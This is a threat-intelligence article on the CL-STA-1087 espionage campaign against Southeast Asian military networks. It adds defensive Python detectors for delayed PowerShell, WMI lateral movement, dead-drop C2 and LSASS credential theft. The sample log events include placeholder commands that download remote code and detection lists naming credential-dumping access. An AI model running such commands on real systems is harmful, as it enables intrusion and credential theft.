A sophisticated cyber espionage campaign has breached military systems across Southeast Asia. The operation, tracked as CL-STA-1087, has reportedly been active since at least 2020. It has quietly targeted sensitive military networks without drawing immediate attention.
This was not a disruptive cyberattack. There were no sudden shutdowns or visible damage. Instead, the attackers focused on staying hidden and collecting information over time. Their goal was to understand military systems rather than interfere with them.
The campaign came to light when security systems detected unusual PowerShell activity. PowerShell is normally used for system management; in this case it was being used to run hidden scripts. By the time investigators began examining the issue, parts of the network had already been compromised.
The attackers focused on high-value targets. These included military command-and-control systems, internal military structures, and joint operations data. Such information can reveal how military forces are organized and how they respond to different situations.
Investigators assess with moderate confidence that the activity is linked to a China-aligned threat actor. This is based on patterns in behavior and infrastructure, though no specific group has been officially named.
Entry Methods and Initial Network Compromise
The attackers used carefully planned methods to enter the systems. They deployed PowerShell scripts with built-in delays, so that nothing ran at the moment the script arrived. The scripts often remained inactive for several hours, helping them avoid automated security detection.
Once activated, the scripts created reverse shells. This allowed the attackers to remotely access and control infected systems. They connected to multiple command-and-control servers, which acted as central hubs for their operations.
The initial breach often occurred through unmanaged endpoints. These are devices that are not closely monitored by security systems. Such entry points made it easier for attackers to access larger networks.
After gaining access, the attackers avoided sudden movements. Their approach was slow and controlled. This helped them stay unnoticed while expanding their reach inside the network.
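A defender's view of the delayed-script pattern described above: the following detection logic runs over constructed PowerShell script-block log entries and flags those that pair a long Start-Sleep with a cmdlet or .NET type that reaches the network. This is an added example written for this article, not tooling from the investigation; the event fields, the one-hour threshold and the marker list are assumptions to tune against your own environment.

```python
"""Flag PowerShell script-block log entries that pair a long sleep with
network activity, the delayed-execution pattern described above.

Added example for this article, not tooling from the investigation. The
events are a constructed, simplified stand-in for PowerShell script-block
logging (Event ID 4104); the field names, threshold and marker list are
assumptions to tune against your own environment.
"""
import re
from dataclasses import dataclass

# A sleep of at least this many seconds is treated as a deliberate delay.
DELAY_THRESHOLD_SECONDS = 3600

# Cmdlets and .NET types showing that the script talks to the network.
NETWORK_MARKERS = (
    "net.sockets",
    "net.webclient",
    "invoke-webrequest",
    "invoke-restmethod",
    "downloadstring",
)

# Start-Sleep takes -Seconds/-s (also positional) or -Milliseconds/-ms.
_SLEEP_RE = re.compile(
    r"start-sleep\s+(?:-(?P<unit>seconds|s|milliseconds|ms)\s+)?(?P<n>\d+)",
    re.IGNORECASE,
)


@dataclass
class ScriptBlockEvent:
    event_id: int
    host: str
    script_text: str


def max_sleep_seconds(script_text: str) -> int:
    """Longest Start-Sleep duration in the script, normalised to seconds."""
    longest = 0
    for match in _SLEEP_RE.finditer(script_text):
        duration = int(match.group("n"))
        unit = (match.group("unit") or "seconds").lower()
        if unit in ("milliseconds", "ms"):
            duration //= 1000
        longest = max(longest, duration)
    return longest


def is_delayed_network_script(event: ScriptBlockEvent) -> bool:
    """True when a 4104 event shows both a long sleep and a network marker."""
    if event.event_id != 4104:
        return False
    text = event.script_text.lower()
    has_network = any(marker in text for marker in NETWORK_MARKERS)
    return has_network and max_sleep_seconds(event.script_text) >= DELAY_THRESHOLD_SECONDS


def find_suspicious(events):
    """Hosts whose script blocks match the delayed-network pattern, in order."""
    return [e.host for e in events if is_delayed_network_script(e)]


# Constructed sample events: hostnames, URLs and script text are made up.
SAMPLE_EVENTS = [
    ScriptBlockEvent(4104, "WS-01", "Get-Service | Where-Object Status -eq 'Running'"),
    ScriptBlockEvent(4104, "WS-02", "Start-Sleep -Seconds 5; Invoke-WebRequest http://intranet.example/health"),
    ScriptBlockEvent(4104, "WS-03", "Start-Sleep -s 14400; Invoke-RestMethod http://PLACEHOLDER-HOST/task"),
    ScriptBlockEvent(4104, "WS-04", "Start-Sleep -ms 7200000; (New-Object Net.WebClient).DownloadString('http://PLACEHOLDER-HOST/x')"),
    ScriptBlockEvent(4103, "WS-05", "Start-Sleep -Seconds 9000; Invoke-RestMethod http://PLACEHOLDER-HOST/y"),
]

if __name__ == "__main__":
    for host in find_suspicious(SAMPLE_EVENTS):
        print(f"delayed PowerShell script block with network activity on {host}")
```

Only WS-03 and WS-04 trigger: WS-02 sleeps for five seconds, WS-05 is not a script-block event, and WS-01 never touches the network. Millisecond sleeps are normalised so that a `-ms` delay of two hours is not missed.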
Stealth Tactics and Long-Term Persistence
One of the key features of this campaign was its patience. The attackers often remained completely inactive for months after gaining access. This dormancy made detection extremely difficult.
When they resumed activity, they moved laterally across systems. They used legitimate tools such as Windows Management Instrumentation and .NET commands. These tools are commonly used by system administrators, which helped the attackers blend in.
This method is often called “living off the land.”
The attackers also minimized their digital footprint. Their actions were designed to look like routine system behavior. This made it harder for traditional security systems to identify unusual activity.
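The WMI-based lateral movement described above leaves a process-tree trace that administrators' own use of WMI rarely does: an interpreter spawned under the WMI provider host, or a WMI client pointed at a remote machine. The following detection logic runs over constructed process-creation events and surfaces both. This is an added example written for this article, not tooling from the investigation; the event shape follows Sysmon Event ID 1, and the image lists are assumptions to tune against your own baseline.

```python
"""Flag process-creation events that fit WMI-based remote execution and
"living off the land" tooling, as described in the section above.

Added example for this article, not tooling from the investigation. Events
are constructed in the shape of Sysmon Event ID 1 (ProcessCreate); the
hostnames, paths and command lines are made up, and the image lists are
assumptions to tune against your own baseline.
"""
from dataclasses import dataclass

# WmiPrvSE.exe hosts WMI providers; remote Win32_Process.Create calls run
# under it, so an interpreter or shell spawned beneath it is unusual.
WMI_PROVIDER_HOST = "wmiprvse.exe"

# Interpreters and shells that administrators rarely launch through WMI.
SHELL_IMAGES = {
    "powershell.exe", "pwsh.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe",
}

# Tools that can issue WMI calls, and the arguments that point them at
# another host.
WMI_CLIENTS = {"wmic.exe", "powershell.exe", "pwsh.exe"}
REMOTE_WMI_MARKERS = ("/node:", "invoke-wmimethod", "invoke-cimmethod", "-computername")


@dataclass
class ProcessEvent:
    host: str
    image: str
    parent_image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent) -> list:
    """Names of the rules this event triggers (empty when it looks benign)."""
    hits = []
    image = _basename(event.image)
    parent = _basename(event.parent_image)
    cmd = event.command_line.lower()
    if parent == WMI_PROVIDER_HOST and image in SHELL_IMAGES:
        hits.append("wmi_spawned_shell")
    if image in WMI_CLIENTS and any(m in cmd for m in REMOTE_WMI_MARKERS):
        hits.append("remote_wmi_execution")
    return hits


def triage(events) -> list:
    """(host, rule) pairs for every rule hit, in event order."""
    return [(e.host, rule) for e in events for rule in classify(e)]


# Constructed sample events; the hosts and command lines are made up.
SAMPLE_EVENTS = [
    ProcessEvent("WS-01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe", "powershell.exe"),
    ProcessEvent("SRV-02", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                 "powershell.exe -NoProfile -WindowStyle Hidden"),
    ProcessEvent("WS-03", r"C:\Windows\System32\wbem\WMIC.exe",
                 r"C:\Windows\System32\cmd.exe",
                 "wmic /node:PLACEHOLDER-HOST os get caption"),
    ProcessEvent("SRV-02", r"C:\Windows\System32\WerFault.exe",
                 r"C:\Windows\System32\wbem\WmiPrvSE.exe", "WerFault.exe -u -p 4120"),
]

if __name__ == "__main__":
    for host, rule in triage(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The first rule fires on the receiving end of a WMI call (SRV-02), the second on the sending end (WS-03), so correlating the two across hosts shows the direction of movement. The WerFault event is deliberately included: processes do legitimately appear under WmiPrvSE.exe, which is why the rule is restricted to interpreters and shells rather than any child at all.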
Custom Malware and Data Extraction Techniques
The attackers used several advanced tools to maintain access and collect data. One of the main tools was a backdoor known as AppleChris. This malware enabled hidden communication with command servers.
AppleChris used a dead drop resolver technique. It retrieved encoded instructions from public platforms like Pastebin and Dropbox. The data was then decrypted using a private key, making it difficult to track.
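The dead-drop technique described above is hard to block at the network edge, because the services involved are legitimate and widely used, but it is visible when the wrong process is doing the talking. The following detection logic runs over constructed network-connection events and flags connections to public paste and file-sharing domains from anything that is not a browser or an allowlisted client. This is an added example written for this article, not tooling from the investigation; the event shape follows Sysmon Event ID 3, and the domain, browser and allowlist sets are assumptions to tune locally.

```python
"""Flag outbound connections to public paste and file-sharing services from
processes that have no business contacting them, the dead-drop pattern
described above.

Added example for this article, not tooling from the investigation. Events
are constructed in the shape of Sysmon Event ID 3 (NetworkConnect); the
domain list, browser list and allowlist are assumptions to tune locally.
"""
from dataclasses import dataclass

# Services the article names as dead-drop hosts, plus Dropbox's content domain.
DEAD_DROP_DOMAINS = ("pastebin.com", "dropbox.com", "dropboxusercontent.com")

# Interactive browsers: users reach these sites through them all day.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}

# Assumed-benign clients. Name matching alone is weak; a real deployment
# would also check the binary's path and signer.
ALLOWLISTED = {"dropbox.exe"}


@dataclass
class NetworkEvent:
    host: str
    image: str
    dest_hostname: str
    dest_port: int


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def domain_matches(hostname: str, domain: str) -> bool:
    """Exact or subdomain match; 'pastebin.com.evil.example' must not match."""
    h = hostname.lower().rstrip(".")
    return h == domain or h.endswith("." + domain)


def is_dead_drop_candidate(event: NetworkEvent) -> bool:
    """True for a non-browser, non-allowlisted process reaching a dead-drop domain."""
    image = _basename(event.image)
    if image in BROWSERS or image in ALLOWLISTED:
        return False
    return any(domain_matches(event.dest_hostname, d) for d in DEAD_DROP_DOMAINS)


def find_candidates(events) -> list:
    """(host, process, destination) for every candidate, in event order."""
    return [
        (e.host, _basename(e.image), e.dest_hostname)
        for e in events
        if is_dead_drop_candidate(e)
    ]


# Constructed sample events; hosts and paths are made up.
SAMPLE_EVENTS = [
    NetworkEvent("WS-01", r"C:\Program Files\Google\Chrome\Application\chrome.exe", "pastebin.com", 443),
    NetworkEvent("WS-02", r"C:\Windows\System32\dllhost.exe", "pastebin.com", 443),
    NetworkEvent("SRV-03", r"C:\Windows\System32\svchost.exe", "dl.dropboxusercontent.com", 443),
    NetworkEvent("WS-04", r"C:\Program Files (x86)\Dropbox\Client\Dropbox.exe", "client.dropbox.com", 443),
    NetworkEvent("WS-05", r"C:\Windows\System32\svchost.exe", "pastebin.com.evil.example", 443),
]

if __name__ == "__main__":
    for host, image, dest in find_candidates(SAMPLE_EVENTS):
        print(f"{host}: {image} -> {dest}")
```

Two events survive: a COM surrogate and a service host contacting paste and content-delivery domains. The last sample shows why the domain check is a suffix match on a dot boundary rather than a plain substring test; a look-alike domain that merely contains "pastebin.com" would otherwise generate a false positive, and the same boundary logic keeps "dropboxusercontent.com" from being mistaken for "dropbox.com".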
Another tool, MemFun, operated entirely in system memory. It did not write files to the disk, which helped it avoid detection. It also hid inside legitimate system processes, such as the Windows DLL host.
MemFun used dynamically generated Blowfish encryption keys for each session. This ensured that network traffic remained difficult to analyze.
For credential theft, the attackers used a modified version of Mimikatz called Getpass. This tool targeted the Windows LSASS process to extract passwords and authentication data.
The stolen information was stored in a file named WinSAT.db, which appeared to be a normal system file. This helped the attackers hide their activity.
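Both artefacts in the two paragraphs above, a tool reading LSASS memory and credentials staged in a file named WinSAT.db, are observable on the endpoint. The following detection logic runs over constructed process-access and file-creation events and flags a non-system process opening lsass.exe with memory-read access, and the creation of a WinSAT.db file by anything other than the legitimate WinSAT tool. This is an added example written for this article, not tooling from the investigation; the event shapes follow Sysmon Event IDs 10 and 11, the paths are made up, and the benign-source allowlist is an assumption to tune against your own baseline.

```python
"""Flag two artefacts described above: non-system processes reading LSASS
memory, and creation of a file named WinSAT.db by anything other than the
legitimate WinSAT tool.

Added example for this article, not tooling from the investigation. Events
are constructed in the shape of Sysmon Event ID 10 (ProcessAccess) and
Event ID 11 (FileCreate); hostnames and paths are made up, and the source
allowlist is an assumption to tune against your own baseline.
"""
from dataclasses import dataclass

# Access-mask bit that lets the caller read another process's memory.
PROCESS_VM_READ = 0x0010

# Processes assumed to legitimately open LSASS with read access (the Windows
# subsystem process and Microsoft Defender's engine). Tune to your baseline.
ASSUMED_BENIGN_SOURCES = {"csrss.exe", "msmpeng.exe"}

# The article describes stolen credentials being staged under this name.
STAGING_FILENAME = "winsat.db"
LEGITIMATE_WINSAT_IMAGE = "winsat.exe"


@dataclass
class ProcessAccessEvent:
    host: str
    source_image: str
    target_image: str
    granted_access: int


@dataclass
class FileCreateEvent:
    host: str
    image: str
    target_filename: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_lsass_access(event: ProcessAccessEvent):
    """Rule name when a non-allowlisted process reads LSASS memory, else None."""
    if _basename(event.target_image) != "lsass.exe":
        return None
    if _basename(event.source_image) in ASSUMED_BENIGN_SOURCES:
        return None
    if event.granted_access & PROCESS_VM_READ:
        return "lsass_memory_read"
    return None


def check_winsat_db(event: FileCreateEvent):
    """Rule name when WinSAT.db is created by anything but winsat.exe, else None."""
    if _basename(event.target_filename) != STAGING_FILENAME:
        return None
    if _basename(event.image) == LEGITIMATE_WINSAT_IMAGE:
        return None
    return "winsat_db_dropped"


def triage(events) -> list:
    """(host, rule) pairs for every event that trips a rule, in event order."""
    hits = []
    for event in events:
        if isinstance(event, ProcessAccessEvent):
            rule = check_lsass_access(event)
        elif isinstance(event, FileCreateEvent):
            rule = check_winsat_db(event)
        else:
            rule = None
        if rule:
            hits.append((event.host, rule))
    return hits


# Constructed sample events; the getpass.exe path is a made-up example.
LSASS = r"C:\Windows\System32\lsass.exe"
SAMPLE_EVENTS = [
    ProcessAccessEvent("SRV-01", r"C:\Windows\System32\csrss.exe", LSASS, 0x1FFFFF),
    ProcessAccessEvent("SRV-01", r"C:\Windows\System32\taskmgr.exe", LSASS, 0x1400),
    ProcessAccessEvent("SRV-01", r"C:\Users\Public\getpass.exe", LSASS, 0x1010),
    ProcessAccessEvent("WS-02", r"C:\Windows\System32\svchost.exe", r"C:\Windows\explorer.exe", 0x1010),
    FileCreateEvent("SRV-01", r"C:\Users\Public\getpass.exe", r"C:\Windows\Temp\WinSAT.db"),
    FileCreateEvent("WS-03", r"C:\Windows\System32\WinSAT.exe", r"C:\Windows\Performance\WinSAT\winsat.log"),
    FileCreateEvent("WS-04", r"C:\Windows\System32\svchost.exe", r"C:\ProgramData\WinSAT.db"),
]

if __name__ == "__main__":
    for host, rule in triage(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The access-mask test is deliberately a bit test rather than a comparison against a fixed list of masks: Task Manager's query-only access (0x1400) is ignored, while any mask that includes PROCESS_VM_READ is caught regardless of which other bits accompany it. On SRV-01 the same constructed tool both reads LSASS and writes WinSAT.db, which is the pairing an analyst would want to see on one timeline.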
Investigators also found signs pointing to a China-linked origin. The attackers operated during UTC+8 working hours, used China-based infrastructure, and included Simplified Chinese elements in their command environment.
